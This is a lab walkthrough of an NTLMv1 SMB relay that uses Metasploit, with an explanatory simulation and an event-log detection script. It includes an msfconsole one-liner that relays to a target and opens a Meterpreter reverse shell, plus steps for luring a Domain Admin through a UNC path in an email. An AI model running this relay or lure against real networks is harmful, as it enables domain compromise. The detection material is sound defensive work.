Outlined below is one method of carrying out an NTLMv1 SMB relay attack for the purpose of obtaining a Meterpreter shell on our target. For this type of attack to work, we have to insert ourselves into the NTLM challenge/response process. More on that in a minute.
First, we need a basic understanding of how NTLM challenge/response works. When a client first attempts to connect to a network share (for example), the server replies with a random value, the “challenge”, and asks the client to prove it knows the user’s password. The client computes a response from that challenge using the user’s password hash (in NTLMv1, the 8-byte challenge is DES-encrypted under keys cut from the 16-byte NT hash) and sends it back. This is the “response”. The server, or the domain controller on its behalf, performs the same computation using the password hash it already has stored for that user and compares the two values; nothing is decrypted. If they match, the user is considered authenticated. The password hash itself never crosses the wire, but anyone who can obtain a fresh response to a challenge of their choosing can log on as that user, and that is exactly what a relay exploits.
Using Metasploit Framework, we can create a listening SMB service and automate much of the process of inserting ourselves into the middle of the NTLM challenge/response process.
Metasploit box: 172.17.130.81
Domain Admin Workstation: 172.17.130.33
Target Server: 172.17.130.75
Our goal in this scenario is to get a shell on 172.17.130.75.
To do this, we first need to “convince” our victim (172.17.130.33) to make a connection to our Metasploit box (172.17.130.81). To accomplish that piece, we are going to embed a UNC path referencing our Metasploit box in an email message. When the message is rendered, the victim’s computer tries to open that path over SMB and starts the NTLM challenge/response process described above, with our Metasploit box in the role of the server. Instead of issuing its own challenge, however, our Metasploit box opens a connection to our Target (172.17.130.75), takes the challenge the Target issues, hands it to the victim, and forwards the victim’s response back to the Target. The Target then sees a valid Domain Admin logon arriving from our Metasploit box, which is what we use to get a shell on the Target. One caveat: this only works against a Target that does not require SMB signing, because signing needs the session key derived from the password hash, which we never obtain.
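The exchange just described, as an added example that is not part of the original post: a small model of a server that verifies by recomputing rather than decrypting, a victim that answers whatever challenge it is handed, and the attacker forwarding the target’s challenge and the victim’s response between them. The real NTLMv1 response is DES-based (the 8-byte challenge encrypted under three 7-byte keys cut from the 16-byte NT hash); HMAC-MD5 stands in for that computation here so the example runs offline with only the standard library. The NT hash value, host names and account name are constructed for the example.

```python
"""Model of NTLM challenge/response and of an SMB relay against it.

Added example, not code from the original post. HMAC-MD5 stands in for the
DES-based NTLMv1 response computation; the NT hash, host names and account
name below are constructed values.
"""
import hashlib
import hmac
import os

ATTACKER_IP = "172.17.130.81"   # Metasploit box
VICTIM_IP = "172.17.130.33"     # Domain Admin workstation
TARGET_IP = "172.17.130.75"     # target server
USER = "DOMAIN\\da.user"        # constructed account name

# Constructed NT hash of the Domain Admin's password. The victim derives it
# from the typed password and the authenticating side has it stored; the
# attacker never sees it at any point in the exchange.
NT_HASH = bytes.fromhex("8846f7eaee8fb117ad06bdd830b7586c")


def compute_response(nt_hash: bytes, challenge: bytes) -> bytes:
    """Stand-in for the NTLMv1 response function: a keyed function of the
    challenge whose key is the NT hash. Only a holder of the hash can
    produce a valid response, and the response reveals nothing about it."""
    return hmac.new(nt_hash, challenge, hashlib.md5).digest()


class Server:
    """The authenticating side. It verifies by recomputing the response from
    the stored hash and comparing; it never decrypts anything."""

    def __init__(self, name: str, stored_hash: bytes):
        self.name = name
        self.stored_hash = stored_hash
        self.pending = {}   # connection id -> challenge issued on it
        self.logons = []    # what a 4624 event on the target would record

    def challenge(self, conn: str) -> bytes:
        c = os.urandom(8)   # fresh 8-byte challenge for every connection
        self.pending[conn] = c
        return c

    def authenticate(self, conn: str, user: str, workstation: str,
                     src_ip: str, response: bytes) -> bool:
        expected = compute_response(self.stored_hash, self.pending.pop(conn))
        ok = hmac.compare_digest(expected, response)
        if ok:
            # Workstation name is copied from the client's AUTHENTICATE
            # message; the source address is the peer that delivered it.
            self.logons.append({"user": user, "workstation": workstation,
                                "src_ip": src_ip})
        return ok


class Client:
    """The victim workstation: it answers whatever challenge it is handed."""

    def __init__(self, name: str, nt_hash: bytes):
        self.name = name
        self.nt_hash = nt_hash

    def respond(self, challenge: bytes) -> bytes:
        return compute_response(self.nt_hash, challenge)


def direct_logon(victim: Client, target: Server) -> bool:
    """Normal case: the victim talks to the target directly."""
    conn = "victim->target"
    resp = victim.respond(target.challenge(conn))
    return target.authenticate(conn, USER, victim.name, VICTIM_IP, resp)


def relay_logon(victim: Client, target: Server) -> bool:
    """Relay: the victim connects to the attacker (the UNC path in the
    e-mail); the attacker connects to the target, forwards the target's
    challenge to the victim, and forwards the victim's response back."""
    conn = "attacker->target"
    target_challenge = target.challenge(conn)            # attacker receives it
    victim_response = victim.respond(target_challenge)   # victim answers it
    # The relayed AUTHENTICATE still names the victim's workstation, but the
    # target sees the attacker's address as the source of the session.
    return target.authenticate(conn, USER, victim.name, ATTACKER_IP, victim_response)


def replay_logon(captured_response: bytes, target: Server) -> bool:
    """Why the relay has to be live: a response captured earlier answers a
    different challenge, and the target issues a fresh one every time."""
    conn = "attacker->target-replay"
    target.challenge(conn)
    return target.authenticate(conn, USER, "DA-WKS01", ATTACKER_IP, captured_response)


if __name__ == "__main__":
    victim, target = Client("DA-WKS01", NT_HASH), Server("TARGETSRV", NT_HASH)
    print("direct:", direct_logon(victim, target))
    print("relay: ", relay_logon(victim, target))
    print("replay:", replay_logon(victim.respond(os.urandom(8)), target))
    print(target.logons[-1])
```

The relayed logon succeeds even though the attacker never held the hash, and the record the target keeps of it names the victim’s workstation but the attacker’s address, which is the trace to look for later in the event log. The replay fails because the target’s challenge is fresh per connection, which is why the attacker has to be in the path while the victim is connecting rather than capturing a response and using it afterwards.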
To start, we need to fire up Metasploit Framework and load the SMB Relay module. This can be achieved with the following one-liner:
msfconsole -x "use windows/smb/smb_relay; set payload windows/meterpreter/reverse_tcp; set LHOST 172.17.130.81; set SMBHOST 172.17.130.75; set SRVHOST 172.17.130.81; run"
Here SRVHOST is the address our fake SMB server listens on (the one the victim will be lured to), SMBHOST is the Target we relay the authentication to, and LHOST is where the Meterpreter payload connects back once it runs on the Target.
We now need to send an email to our victim with an embedded reference to our Metasploit box that Outlook will (hopefully) load automatically when the message is rendered. To achieve this (and there may be a better way), I created a file named temp.html and typed up the following HTML code:
After saving it, I re-opened the file using Word (2016). I hit control-a (select all), pasted the entire contents into a new email message (Outlook 2016), typed up a generic message to the victim, and then hit send. Below is a copy of the message as opened on the Domain Admin’s workstation (172.17.130.33) in Outlook (2016).
As soon as the message is opened, Outlook tries to fetch the referenced UNC path and the normal NTLM challenge/response process is kicked off; in the background, however, our Metasploit box is relaying the challenge and response to 172.17.130.75, and once the relayed session authenticates it delivers the payload. We now have our Meterpreter session on 172.17.130.75.
If we look in the Windows Event Logs on 172.17.130.75, we can see the suspicious activity: the relayed logon for the Domain Admin account arriving from our Metasploit box (172.17.130.81) rather than from the Domain Admin’s workstation, followed by the payload being delivered and executed.
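A detection pass over that kind of event data, as an added example that is not part of the original post. The records below are constructed in the shape of a Security log 4624 (logon) event and a System log 7045 (service installed) event, and the host inventory is made up; nothing here was taken from a real log. The heuristic is that in a relayed logon the Workstation Name field still carries the victim’s host name (it is copied from the NTLM AUTHENTICATE message that was relayed unchanged), while Source Network Address is the attacker’s machine, so the two disagree with the inventory.

```python
"""Spotting a relayed NTLM logon in Windows event data.

Added example, not from the original post. EVENTS and INVENTORY are
constructed; the field names follow those of Security 4624 and System 7045
events, but no value here comes from a real log.
"""
from datetime import datetime, timedelta

# Constructed inventory: host name -> address it is expected to log on from.
INVENTORY = {
    "DA-WKS01": "172.17.130.33",   # Domain Admin workstation
    "FILESRV02": "172.17.130.50",
}

ATTACKER_IP = "172.17.130.81"

# Constructed events as they might be exported from the target, 172.17.130.75.
EVENTS = [
    {"time": "2017-05-02T09:12:01", "id": 4624, "logon_type": 3,
     "auth_pkg": "NTLM", "account": "DOMAIN\\da.user",
     "workstation": "DA-WKS01", "src_ip": "172.17.130.33"},        # genuine
    {"time": "2017-05-02T09:15:44", "id": 4624, "logon_type": 3,
     "auth_pkg": "Kerberos", "account": "DOMAIN\\svc.backup",
     "workstation": "FILESRV02", "src_ip": "172.17.130.50"},       # not NTLM
    {"time": "2017-05-02T09:40:15", "id": 4624, "logon_type": 3,
     "auth_pkg": "NTLM", "account": "DOMAIN\\da.user",
     "workstation": "DA-WKS01", "src_ip": ATTACKER_IP},            # relayed
    {"time": "2017-05-02T09:40:16", "id": 7045,
     "service": "hRkQtGcw", "image": "%SYSTEMROOT%\\FqNaVpEe.exe"},  # payload
    {"time": "2017-05-02T11:02:09", "id": 7045,
     "service": "VendorAgent", "image": "C:\\Program Files\\Vendor\\agent.exe"},
]


def _ts(e: dict) -> datetime:
    return datetime.fromisoformat(e["time"])


def relayed_logons(events: list, inventory: dict) -> list:
    """Network NTLM logons whose Workstation Name maps to a different
    address than the one the session actually came from."""
    hits = []
    for e in events:
        if e["id"] != 4624 or e["logon_type"] != 3 or e["auth_pkg"] != "NTLM":
            continue
        expected = inventory.get(e["workstation"])
        if expected is not None and expected != e["src_ip"]:
            hits.append(e)
    return hits


def service_installs_after(events: list, logon: dict, window_s: int = 60) -> list:
    """7045 events shortly after a suspicious logon: a service created over
    the relayed admin session is how a psexec-style payload gets executed."""
    start = _ts(logon)
    end = start + timedelta(seconds=window_s)
    return [e for e in events if e["id"] == 7045 and start <= _ts(e) <= end]


def report(events: list, inventory: dict) -> list:
    """One finding per suspicious logon, with any service install it led to."""
    findings = []
    for logon in relayed_logons(events, inventory):
        findings.append({
            "time": logon["time"],
            "account": logon["account"],
            "claimed_workstation": logon["workstation"],
            "expected_ip": inventory[logon["workstation"]],
            "actual_ip": logon["src_ip"],
            "services": [s["service"] for s in service_installs_after(events, logon)],
        })
    return findings


if __name__ == "__main__":
    for finding in report(EVENTS, INVENTORY):
        print(finding)
```

Workstation Name is supplied by the client, and an NTLMv1 AUTHENTICATE message carries no integrity check that would stop a relay from rewriting it, so this catches a relay that forwards the message unchanged, as the one above does, and a hit should be treated as a lead to chase through the victim’s own logs rather than as proof on its own.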
And finally our meterpreter shell: